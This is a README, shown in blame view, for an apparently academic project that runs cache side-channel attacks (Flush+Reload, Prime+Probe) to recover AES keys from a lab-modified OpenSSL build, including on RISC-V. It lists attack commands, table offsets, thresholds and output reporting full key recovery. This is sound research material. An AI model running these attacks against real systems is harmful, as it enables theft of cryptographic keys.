README.md 5.24 KB
Newer Older
1
2
# Simple Cache Side-Channal Attacks (CSCAs)

3
4
5
Compile with `make`.
Note that GCC option `-O2` is necessary for Prime+Probe 8 attack.

6
7
The AES last round attack implementation (`src/attack_aes_sync.c`, `src/victim_aes`) is adapted from [https://github.com/jinb-park/crypto-side-channel-attack], and replacing the Flush+Reload Prime+Probe.

Yuxiao Mao's avatar
Yuxiao Mao committed
8
## AES
9

10
Source code `aes/` is taken from [OpenSSL tag:OpenSSL_1_1_1k](https://github.com/openssl/openssl/tree/OpenSSL_1_1_1k), which is the last tag before `1_1_1-stable`.
Yuxiao Mao's avatar
Yuxiao Mao committed
11
12
13
14

Modifications:
- Adapt include
- Remove include of `opensslconfig.h`
15
- Align `libaes.so/Te`s to 64 byte boundary (begin of a cache line) in order to simplify attack
Yuxiao Mao's avatar
Yuxiao Mao committed
16
17
18

Note:
- In the default configuration, AES is build without `AES_ASM`, `OPENSSL_AES_CONST_TIME`, `FULL_UNROLL` option.
19
20

Test:
21
- `src/test_aes.c` is inspired by [tiny-AES-c](https://github.com/kokke/tiny-AES-c), which verify AES against the data in:
22
[National Institute of Standards and Technology Special Publication 800-38A 2001 ED](http://nvlpubs.nist.gov/nistpubs/Legacy/SP/nistspecialpublication800-38a.pdf) Appendix F: Example Vectors for Modes of Operation of the AES.
23
24
25
26
27
28
29
30
31
32
33
34
35
36

Run:

```
$ LD_LIBRARY_PATH=. ./test_aes.elf

  key:        2b7e151628aed2a6abf7158809cf4f3c
  plaintext:  6bc1bee22e409f96e93d7e117393172a
  ciphertext: 3ad77bb40d7a3660a89ecaf32466ef97
  ECB Encrypt: encrypted plaintext:  3ad77bb40d7a3660a89ecaf32466ef97
  SUCCESS!
  ECB Decrypt: decrypted ciphertext: 6bc1bee22e409f96e93d7e117393172a
  SUCCESS!
```
37
38
39
40
41
42
43

## Cache Attack Util

Source code `cache/` is partially taken from [Mastik Toolkit 0.02](https://cs.adelaide.edu.au/~yval/Mastik/).

Modification:
- Add RISC-V ISA assembly
44

45
46
47
48
49
50
51
52
53
54
## Cache Profiling

```
$ ./cache_profiling_hit.elf
$ ./cache_profiling_fr.elf
$ ./cache_profiling_pp1.elf 0
$ ./cache_profiling_pp8.elf 0

```

55
## AES Synchronous Known Data Attack
56

57
58
59
60
61
62
63
64
65
66
67
68
69
Available attacks (configure with macros):
- Attack type
  - Last round attack
  - First round attack (Make with `-WITH_ATTACK_FIRSTROUND`, they are not included in Makefile yet)
- Cache eviction strategy
  - Flush+Reload
  - Prime+Reload (1 way / 8 ways)
  - Prime+Prime (1 way / 8 ways)
- Victim access strategy
  - single process (victim inside attacker)
  - shared memory

### Prepare
70

71
Find Te0-3 offset for attacker. As library are publically available, we suppose that the attacker can find these offset without problem.
72
73
74
75

```
$ nm libaes.so | grep Te

76
77
78
79
  0000000000003440 r Te0
  0000000000003040 r Te1
  0000000000002c40 r Te2
  0000000000002840 r Te3
80
81
```

82
### Victim
83

84
Command line mode (only allows one single argument):
85
86
87
88
89
90
91

```
$ LD_LIBRARY_PATH=. ./victim_aes.elf 6bc1bee22e409f96e93d7e117393172a

  3ad77bb40d7a3660a89ecaf32466ef97
```

92
Shared memory mode:
93

94
95
Shared memory is managed by `status` variable (insteed of semaphore).

96
97
98
99
100
```
$ LD_LIBRARY_PATH=. ./victim_aes_shmem.elf &
$ ./test_victim_aes_shmem.elf
```

101
### Flush+Reload
102
103

```
104
105
106
107
$ LD_LIBRARY_PATH=. ./attack_aes_lastround_fr.elf 03440 03040 02c40 02840 1000 50

  (Usage: <Offset_Te0> <Offset_Te1> <Offset_Te2> <Offset_Te3> <samples> <threshold>)

108
$ LD_LIBRARY_PATH=. ./victim_aes_shmem.elf &
Yuxiao Mao's avatar
Yuxiao Mao committed
109
$ ./attack_aes_lastround_fr_shmem.elf 03440 03040 02c40 02840 3000 140
110

Yuxiao Mao's avatar
Yuxiao Mao committed
111
112
113
  [Attacker] Prediction success 14 byte (total 16).

  Note: - Recover 4-9 byte with 1000 plaintext
114
```
115
116
117
118
119
120

### Prime+Probe 1

It is design for direct-mapped cache, though probably not giving any results on normal machine.

```
121
$ LD_LIBRARY_PATH=. ./attack_aes_lastround_pp1.elf 03440 03040 02c40 02840 1000 50
122
123

$ LD_LIBRARY_PATH=. ./victim_aes_shmem.elf &
124
$ ./attack_aes_lastround_pp1_shmem.elf 03440 03040 02c40 02840 1000 120
125
126
127
128
129
130
131
132

```

### Prime+Probe 8

It is design for 8 way associative, 64 set cache.

```
133
$ LD_LIBRARY_PATH=. ./attack_aes_lastround_pp8.elf 03440 03040 02c40 02840 1000 200
134
135

$ LD_LIBRARY_PATH=. ./victim_aes_shmem.elf &
136
$ ./attack_aes_lastround_pp8_shmem.elf 03440 03040 02c40 02840 1000 1000
137
138

```
139

Yuxiao Mao's avatar
Yuxiao Mao committed
140
### On Rocket Chip
141
142

```
143
$ LD_LIBRARY_PATH=. ./attack_aes_lastround_pp1.elf 01740 01b40 01f40 02340 1000 40
144
145
146

  [Attacker] Prediction success 16 byte (total 16).

147
  Note: - Cache profiling pp1 shows that when no conflict pp1 takes 12 cycles (97%), with conflict 37 cycles (98%).
148

149
$ LD_LIBRARY_PATH=. ./attack_aes_lastround_pp8.elf 01740 01b40 01f40 02340 3000 320
150
151
152
153
154
155
156
157

  [Attacker] Prediction success 16 byte (total 16).

  Note: - with 1000 plaintext: 7-11 byte
        - with l1_probe + l1_probe (insteed of l1_bprobe that probing backward): 3-6 byte
        - threshold: 320 seems to be the best threshold for 1000 plaintext.
                     If use 3000 plaintext then thresh can be set from 290 - 330.
                     Cache profiling pp8 shows that when no conflict 272 cycles (96%), with conflict >= 297.
Yuxiao Mao's avatar
Yuxiao Mao committed
158

159
$ LD_LIBRARY_PATH=. ./attack_aes_lastround_pp1r.elf 01740 01b40 01f40 02340 1000 30
Yuxiao Mao's avatar
Yuxiao Mao committed
160
161
162
163

  [Attacker] Prediction success 16 byte (total 16).

$ LD_LIBRARY_PATH=. ./victim_aes_shmem.elf &
164
$ LD_LIBRARY_PATH=. ./attack_aes_lastround_pp1r_shmem.elf 01740 01b40 01f40 02340 3000 80
Yuxiao Mao's avatar
Yuxiao Mao committed
165
166

  Note: - attack needs libaes.so, because it use RELOAD techniques
167
168
        - Recovery once 5 byte with 3000 plaintext (takes too long to execute)

169
170
171
$ LD_LIBRARY_PATH=. ./victim_aes_shmem.elf &
$ LD_LIBRARY_PATH=. ./attack_aes_lastround_pp8r_shmem.elf 01740 01b40 01f40 02340 3000 80

172
```
Yuxiao Mao's avatar
Yuxiao Mao committed
173
174
175
176
177
178

## AES Asynchronous Attack

```
$ LD_LIBRARY_PATH=. ./attack_aes_async_fr.elf
```